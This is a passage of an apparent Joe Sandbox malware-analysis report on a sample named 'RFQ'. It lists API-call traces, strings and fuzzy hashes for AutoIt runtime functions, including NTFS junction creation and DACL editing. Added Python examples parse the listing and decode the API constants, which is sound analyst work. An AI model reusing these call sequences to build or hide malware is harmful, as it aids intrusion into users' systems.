• Opcode Fuzzy Hash: cdf0c90429c0c4d5ea2de72bb34383e6bac8572ad1c2c1e6c5d0e1040d59dd77
• Instruction Fuzzy Hash: 9F917070214741DBCB09EF10D895A6EB7A1BF94310F00886DF9966B3A3DB78ED06CB91
APIs
• EnumChildWindows.USER32(?,0076CF50), ref: 0076CE90
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: ChildEnumWindows
• String ID: 4+~$CLASS$CLASSNN$H+~$INSTANCE$L+~$NAME$P+~$REGEXPCLASS$T+~$TEXT
• API String ID: 3555792229-510292554
• Opcode ID: e3961152deef5aa569214fd175772cb50a7793f1d63898ee0853a0fc8e4621f6
• Instruction ID: fe003b2652288fc727d0f487ed0e782f4fda46615d89891c407b0b12adb72a10
• Opcode Fuzzy Hash: e3961152deef5aa569214fd175772cb50a7793f1d63898ee0853a0fc8e4621f6
• Instruction Fuzzy Hash: FD91B270A00546EADB19DF60C485BFAFB75FF04300F508529DC9AA7141EF39695ACBE0
APIs
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0079E5AB
• LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0079BEAF), ref: 0079E607
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0079E647
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0079E68C
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0079E6C3
• FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0079BEAF), ref: 0079E6CF
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0079E6DF
• DestroyIcon.USER32(?,?,?,?,?,0079BEAF), ref: 0079E6EE
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0079E70B
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0079E717
  • Part of subcall function 00750FA7: __wcsicmp_l.LIBCMT ref: 00751030
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
• String ID: .dll$.exe$.icl
• API String ID: 1212759294-1154884017
• Opcode ID: 03640c4f3f7caeff9a81eb9c4376f5859899bc3e0427b1933aff657f343369fc
• Instruction ID: 191180b7d53e982bd3787226773dfdc347f30b1a6003f2b68c4eb057925e15d9
• Opcode Fuzzy Hash: 03640c4f3f7caeff9a81eb9c4376f5859899bc3e0427b1933aff657f343369fc
• Instruction Fuzzy Hash: 5261AFB1500215FAEF24DF64DC46FEE77A8BB18715F108215F915D60D1EBB8AD90CBA0
APIs
  • Part of subcall function 0073936C: __swprintf.LIBCMT ref: 007393AB
  • Part of subcall function 0073936C: __itow.LIBCMT ref: 007393DF
• CharLowerBuffW.USER32(?,?), ref: 0077D292
• GetDriveTypeW.KERNEL32 ref: 0077D2DF
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0077D327
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0077D35E
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0077D38C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 1148790751-4113822522
• Opcode ID: 36a6783c056b31d9be1ce0c6410305ad21cd2023eb88ffe2198ffed3dc4f7318
• Instruction ID: ac65647b782789c21a8a14fb5e9a357e807b122a68ddb75759a73823d916bd0e
• Opcode Fuzzy Hash: 36a6783c056b31d9be1ce0c6410305ad21cd2023eb88ffe2198ffed3dc4f7318
• Instruction Fuzzy Hash: 835148B1504204EFD710EF11C88596AB3F4FF88758F10896DF88A67252DB39AE06CB92
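The function entries above (an APIs list, then Similarity fields such as String ID, API String ID and Instruction Fuzzy Hash) are the part of the report an analyst pivots on: the String ID values of the entries listed here (@GUI_DRAGFILE, the ControlTreeView command names, CLASSNN/REGEXPCLASS, "set cd door") are strings the AutoIt runtime embeds for its built-in functions, so those functions are interpreter boilerplate rather than the script's payload. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it parses two entries copied from this listing (embedded as a constructed sample, with indentation and link text removed), extracts the API calls, subcalls and split String ID values, and tags entries against a small triage table of AutoIt runtime strings. The triage table and the function names are the example's own assumptions, not something the report states.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in the layout of this report's function entries
# (two entries copied from the listing, leading indentation removed).
SAMPLE_REPORT = """\
APIs
• CharLowerBuffW.USER32(?,?), ref: 0077D292
• GetDriveTypeW.KERNEL32 ref: 0077D2DF
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0077D327
  • Part of subcall function 0073936C: __swprintf.LIBCMT ref: 007393AB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 1148790751-4113822522
• Instruction Fuzzy Hash: 835148B1504204EFD710EF11C88596AB3F4FF88758F10896DF88A67252DB39AE06CB92
APIs
• EnumChildWindows.USER32(?,0076CF50), ref: 0076CE90
Strings
Similarity
• API ID: ChildEnumWindows
• String ID: 4+~$CLASS$CLASSNN$H+~$INSTANCE$L+~$NAME$P+~$REGEXPCLASS$T+~$TEXT
• API String ID: 3555792229-510292554
• Instruction Fuzzy Hash: FD91B270A00546EADB19DF60C485BFAFB75FF04300F508529DC9AA7141EF39695ACBE0
"""

# "• Api.MODULE(args), ref: 0077D327"; the parenthesised args and the comma are optional.
API_RE = re.compile(
    r"^•\s+(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]{8})$"
)
# "• Part of subcall function 0073936C: Api.MODULE ref: 007393AB"
SUBCALL_RE = re.compile(
    r"^•\s+Part of subcall function (?P<func>[0-9A-Fa-f]{8}):\s+(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\([^)]*\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]{8})$"
)
# Any other "• Key: value" line (String ID, API String ID, fuzzy hashes, ...).
KV_RE = re.compile(r"^•\s+(?P<key>[A-Za-z ]+):\s+(?P<val>.*)$")


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)      # (api, module, call site) called directly
    subcalls: list = field(default_factory=list)  # (callee function, api, module, call site)
    strings: list = field(default_factory=list)   # String ID values, split on '$'
    fields: dict = field(default_factory=dict)    # remaining "Key: value" lines


def parse_report(text):
    """Split the listing into entries; each entry starts at an 'APIs' label."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionEntry()
            entries.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue  # section labels (Strings, Similarity, ...) carry no data
        m = SUBCALL_RE.match(line)
        if m:
            current.subcalls.append((m["func"], m["api"], m["mod"], m["ref"]))
            continue
        m = API_RE.match(line)
        if m:
            current.apis.append((m["api"], m["mod"], m["ref"]))
            continue
        m = KV_RE.match(line)
        if m and m["key"] == "String ID":
            current.strings = [s.strip() for s in m["val"].split("$")]
        elif m:
            current.fields[m["key"]] = m["val"]
    return entries


# Assumed triage table (example's own, not from the report): strings the AutoIt
# runtime embeds for specific built-in functions. A hit marks the entry as
# interpreter code rather than script logic worth reversing.
AUTOIT_MARKERS = {
    "CDTray": {"set cd door"},
    "GUI drag/drop": {"@GUI_DRAGFILE", "@GUI_DRAGID", "@GUI_DROPID"},
    "Control descriptor": {"CLASSNN", "REGEXPCLASS", "INSTANCE"},
    "ControlTreeView": {"GETTOTALCOUNT", "ISCHECKED", "UNCHECK"},
}


def classify(entry):
    """Names of AutoIt built-ins whose marker strings appear in the entry."""
    present = set(entry.strings)
    return sorted(name for name, markers in AUTOIT_MARKERS.items() if markers & present)


def fuzzy_hash_index(entries):
    """Instruction Fuzzy Hash -> distinct API names, for pivoting across samples."""
    return {e.fields["Instruction Fuzzy Hash"]: sorted({a for a, _, _ in e.apis})
            for e in entries if "Instruction Fuzzy Hash" in e.fields}


if __name__ == "__main__":
    for e in parse_report(SAMPLE_REPORT):
        print([a for a, _, _ in e.apis], e.fields.get("API String ID"), classify(e))
```

Feed `parse_report` the whole listing instead of the sample to get one record per entry; the `fuzzy_hash_index` output is what you would compare against the same report section for other samples to see which functions are shared runtime code and which are unique to this build.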
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,007A3973,00000016,0000138C,00000016,?,00000016,007CDDB4,00000000,?), ref: 007726F1
                                                                                                                                                    • LoadStringW.USER32(00000000,?,007A3973,00000016), ref: 007726FA
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,007A3973,00000016,0000138C,00000016,?,00000016,007CDDB4,00000000,?,00000016), ref: 0077271C
                                                                                                                                                    • LoadStringW.USER32(00000000,?,007A3973,00000016), ref: 0077271F
                                                                                                                                                    • __swprintf.LIBCMT ref: 0077276F
                                                                                                                                                    • __swprintf.LIBCMT ref: 00772780
                                                                                                                                                    • _wprintf.LIBCMT ref: 00772829
                                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00772840
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                    • API String ID: 618562835-2268648507
                                                                                                                                                    • Opcode ID: af2229491c759ad971eb1a0d03ddf080bb3efdb82b72d4806a4dd9f594ac4eed
                                                                                                                                                    • Instruction ID: 7729f472b4394d4b9e227ca5d66684f081b4e21d44bc3f00733ab8e4e54f5140
                                                                                                                                                    • Opcode Fuzzy Hash: af2229491c759ad971eb1a0d03ddf080bb3efdb82b72d4806a4dd9f594ac4eed
                                                                                                                                                    • Instruction Fuzzy Hash: 02412D72800218FADF15FBE0DD8AEEEB778AF18340F104065B60577093EA696F59CB61
                                                                                                                                                    APIs
                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0077D0D8
                                                                                                                                                    • __swprintf.LIBCMT ref: 0077D0FA
                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0077D137
                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0077D15C
                                                                                                                                                    • _memset.LIBCMT ref: 0077D17B
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 0077D1B7
                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0077D1EC
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0077D1F7
                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 0077D200
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0077D20A
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                                                    • API String ID: 2733774712-3457252023
                                                                                                                                                    • Opcode ID: 980c413593f09793d032186e4bb0c04c289354e2625e011c1c028748a59b91cb
                                                                                                                                                    • Instruction ID: a962a69c4469c9c93809d0dc0d45246caac2f9b723a1583b587fd9ea73bad6da
                                                                                                                                                    • Opcode Fuzzy Hash: 980c413593f09793d032186e4bb0c04c289354e2625e011c1c028748a59b91cb
                                                                                                                                                    • Instruction Fuzzy Hash: 7B3192B6500109ABDB31DFA4CC49FEB37BCEF89741F5081B6F909D2161E7789A458B24
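The numeric arguments in the trace above are easier to read once decoded against the Windows SDK headers: CreateFileW is called with GENERIC_WRITE (0x40000000), OPEN_EXISTING (3) and FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT (0x02200000), and the DeviceIoControl code 0x000900A4 is FSCTL_SET_REPARSE_POINT. Together with CreateDirectoryW, the "\??\%s" format string and the RemoveDirectoryW cleanup, that is the standard sequence for creating an NTFS junction. The following decoder is an added example for reading such traces; it is not part of the Joe Sandbox report or of the analysed sample, the constant tables are copied from winnt.h, winbase.h, winioctl.h and winuser.h, and the input values at the bottom are the ones shown in this trace.

```python
"""Decode raw Windows API argument values from a sandbox API trace into SDK
symbolic names. Added example; constants are from the Windows SDK headers."""

# winnt.h / winbase.h: CreateFileW dwDesiredAccess, dwCreationDisposition,
# dwFlagsAndAttributes (only the flag bits relevant to a trace like this one).
GENERIC_ACCESS = {
    0x80000000: "GENERIC_READ",
    0x40000000: "GENERIC_WRITE",
    0x20000000: "GENERIC_EXECUTE",
    0x10000000: "GENERIC_ALL",
}
CREATION_DISPOSITION = {
    1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
    4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING",
}
FILE_FLAGS = {
    0x80000000: "FILE_FLAG_WRITE_THROUGH",
    0x40000000: "FILE_FLAG_OVERLAPPED",
    0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN",
    0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
    0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
    0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
}
# winuser.h: MessageBoxW uType bits seen in the error-reporting trace above.
MB_FLAGS = {0x10000: "MB_SETFOREGROUND", 0x1000: "MB_SYSTEMMODAL", 0x10: "MB_ICONERROR"}
# winioctl.h: CTL_CODE(DeviceType, Function, Method, Access) layout.
IOCTL_DEVICE = {0x9: "FILE_DEVICE_FILE_SYSTEM"}
IOCTL_METHOD = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
IOCTL_ACCESS = ["FILE_ANY_ACCESS", "FILE_READ_ACCESS", "FILE_WRITE_ACCESS",
                "FILE_READ_ACCESS | FILE_WRITE_ACCESS"]
KNOWN_FSCTL = {
    0x000900A4: "FSCTL_SET_REPARSE_POINT",      # function 41
    0x000900A8: "FSCTL_GET_REPARSE_POINT",      # function 42
    0x000900AC: "FSCTL_DELETE_REPARSE_POINT",   # function 43
}


def decode_flags(value, table):
    """Split a bitmask into the named bits from `table` (highest bit first);
    any bits the table does not know are reported as a hex remainder."""
    names, remaining = [], value
    for bit, name in sorted(table.items(), reverse=True):
        if remaining & bit == bit:
            names.append(name)
            remaining &= ~bit
    if remaining:
        names.append("0x%08X (unknown)" % remaining)
    return names


def decode_ioctl(code):
    """Unpack a DeviceIoControl control code: bits 16-31 device type,
    bits 14-15 required access, bits 2-13 function number, bits 0-1 method."""
    device = (code >> 16) & 0xFFFF
    return {
        "device": IOCTL_DEVICE.get(device, "0x%X" % device),
        "function": (code >> 2) & 0xFFF,
        "method": IOCTL_METHOD[code & 0x3],
        "access": IOCTL_ACCESS[(code >> 14) & 0x3],
        "name": KNOWN_FSCTL.get(code, "unknown"),
    }


def decode_create_file(access, disposition, flags):
    """Name the three CreateFileW arguments that matter when reading a trace."""
    return {
        "access": decode_flags(access, GENERIC_ACCESS),
        "disposition": CREATION_DISPOSITION.get(disposition, "0x%X" % disposition),
        "flags": decode_flags(flags, FILE_FLAGS),
    }


if __name__ == "__main__":
    # Values taken from the CreateFileW / DeviceIoControl / MessageBoxW
    # entries of the trace above.
    print(decode_create_file(0x40000000, 0x00000003, 0x02200000))
    print(decode_ioctl(0x000900A4))
    print(decode_flags(0x00011010, MB_FLAGS))
```

The decoder deliberately reports leftover bits rather than silently dropping them, so a trace value that mixes a known flag with one outside the table (for example a FILE_ATTRIBUTE_* value OR-ed into dwFlagsAndAttributes) is still visible as an unexplained remainder.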
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0079BEF4,?,?), ref: 0079E754
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0079BEF4,?,?,00000000,?), ref: 0079E76B
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0079BEF4,?,?,00000000,?), ref: 0079E776
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0079BEF4,?,?,00000000,?), ref: 0079E783
                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0079E78C
                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0079BEF4,?,?,00000000,?), ref: 0079E79B
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0079E7A4
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0079BEF4,?,?,00000000,?), ref: 0079E7AB
                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0079BEF4,?,?,00000000,?), ref: 0079E7BC
                                                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,007BD9BC,?), ref: 0079E7D5
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0079E7E5
                                                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0079E809
                                                                                                                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0079E834
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0079E85C
                                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0079E872
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3840717409-0
                                                                                                                                                    • Opcode ID: 8ac5d3c95b497871988350cb95e6195aa3e49c27b878d743b9dafb25f368727d
                                                                                                                                                    • Instruction ID: 12ca0b32915ff831cc705f99049d75556ba9065f1965fe7921c080ef01b69ca8
                                                                                                                                                    • Opcode Fuzzy Hash: 8ac5d3c95b497871988350cb95e6195aa3e49c27b878d743b9dafb25f368727d
                                                                                                                                                    • Instruction Fuzzy Hash: 4E412975600208FFDB21DFA5DC88EAA7BB8FF89B15F108168F90597260E7399D41DB21
                                                                                                                                                    APIs
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 0078076F
                                                                                                                                                    • _wcscat.LIBCMT ref: 00780787
                                                                                                                                                    • _wcscat.LIBCMT ref: 00780799
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007807AE
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007807C2
                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 007807DA
                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 007807F4
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00780806
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                                                    • String ID: *.*
                                                                                                                                                    • API String ID: 34673085-438819550
                                                                                                                                                    • Opcode ID: 9166df20f9da985680fc096d0697c9638c6cd5b8ba5d474b215b13cdea0228e9
                                                                                                                                                    • Instruction ID: 6d64483d71fcf3f079dfd96e89ff17fbb11872de08d9474ac75099af5a0a4a14
                                                                                                                                                    • Opcode Fuzzy Hash: 9166df20f9da985680fc096d0697c9638c6cd5b8ba5d474b215b13cdea0228e9
                                                                                                                                                    • Instruction Fuzzy Hash: 85819171644301DFCBA4EF24C8459AEB3E8BF88304F14882EF885D7251E739E9598BD2
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074B34E: GetWindowLongW.USER32(?,000000EB), ref: 0074B35F
                                                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0079EF3B
                                                                                                                                                    • GetFocus.USER32 ref: 0079EF4B
                                                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 0079EF56
                                                                                                                                                    • _memset.LIBCMT ref: 0079F081
                                                                                                                                                    • GetMenuItemInfoW.USER32 ref: 0079F0AC
                                                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 0079F0CC
                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0079F0DF
                                                                                                                                                    • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0079F113
                                                                                                                                                    • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0079F15B
                                                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0079F193
                                                                                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0079F1C8
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 1296962147-4108050209
                                                                                                                                                    • Opcode ID: 5c74f19ae578295d26f2cda9a852375fc9ae8a4f4065b87ab139e4aed5eb3ae7
                                                                                                                                                    • Instruction ID: 1a9f960e5e565535767e2632217ae50c0792a4fd1f192c3d7b0840acbfdb6bbf
                                                                                                                                                    • Opcode Fuzzy Hash: 5c74f19ae578295d26f2cda9a852375fc9ae8a4f4065b87ab139e4aed5eb3ae7
                                                                                                                                                    • Instruction Fuzzy Hash: AE815A71604305EFDB20CF15E884A6ABBE9FB88314F10492EF999D7291D778D905CB92
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0076ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0076ABD7
                                                                                                                                                      • Part of subcall function 0076ABBB: GetLastError.KERNEL32(?,0076A69F,?,?,?), ref: 0076ABE1
                                                                                                                                                      • Part of subcall function 0076ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0076A69F,?,?,?), ref: 0076ABF0
                                                                                                                                                      • Part of subcall function 0076ABBB: HeapAlloc.KERNEL32(00000000,?,0076A69F,?,?,?), ref: 0076ABF7
                                                                                                                                                      • Part of subcall function 0076ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0076AC0E
                                                                                                                                                      • Part of subcall function 0076AC56: GetProcessHeap.KERNEL32(00000008,0076A6B5,00000000,00000000,?,0076A6B5,?), ref: 0076AC62
                                                                                                                                                      • Part of subcall function 0076AC56: HeapAlloc.KERNEL32(00000000,?,0076A6B5,?), ref: 0076AC69
                                                                                                                                                      • Part of subcall function 0076AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0076A6B5,?), ref: 0076AC7A
                                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0076A8CB
                                                                                                                                                    • _memset.LIBCMT ref: 0076A8E0
                                                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0076A8FF
                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 0076A910
                                                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0076A94D
                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0076A969
                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 0076A986
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0076A995
                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0076A99C
                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0076A9BD
                                                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 0076A9C4
                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0076A9F5
                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0076AA1B
